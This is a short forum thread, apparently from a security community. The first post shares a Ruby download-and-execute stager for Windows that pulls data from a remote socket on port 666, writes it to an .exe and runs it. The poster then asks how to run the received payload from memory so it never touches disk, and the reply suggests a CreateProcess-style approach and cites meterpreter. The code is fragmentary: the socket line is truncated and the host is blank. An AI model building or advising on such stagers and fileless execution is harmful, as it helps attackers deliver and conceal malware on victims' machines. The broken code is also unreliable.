Results 1 to 2 of 2

Thread: upload stager... technique?

  1. #1
    Senior Member BigMac's Avatar
    Join Date
    Jan 2008

    Default upload stager... technique?

    ill try to explain the best i can... (win32)

    sock ='666', '')
      # read data from a socket then write to a file...
    	data =
    	destFile ='c:\someplace\file.exe', "wb")
    	destFile.print data.rstrip
    puts "executing payload"
    exec = { system "c:\someplace\file.exe" }
    sleep 100 #stay alive for a long time
    this is a vary simple download and execute function... this client will read data from a host, write this data to a file and then execute the file...

    so, now you have 2 process's running (client.exe and file.exe) instead of writing this data to a file i would like to execute this data from within client.exe

    i dont want file.exe touching the hard drive, i just want to execute the binary data...

    any ideas to better my search results?

  2. #2
    Very good friend of the forum Gitsnik's Avatar
    Join Date
    Jan 2010
    The Crystal Wind


    What you are trying to do is execute a program from a memory location.

    I don't know how ruby does it (meterpreter is written in C, perhaps C++ if my SVN logs are correct), but doing it via a C call is "CreateProcess" and pointing the file pointer at a memory location - or something very similar.

    Side Note: A lot of people immediately assume viral intent when you write one of these, be careful where you start googling this information!
    Still not underestimating the power...

    There is no such thing as bad information - There is truth in the data, so you sift it all, even the crap stuff.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts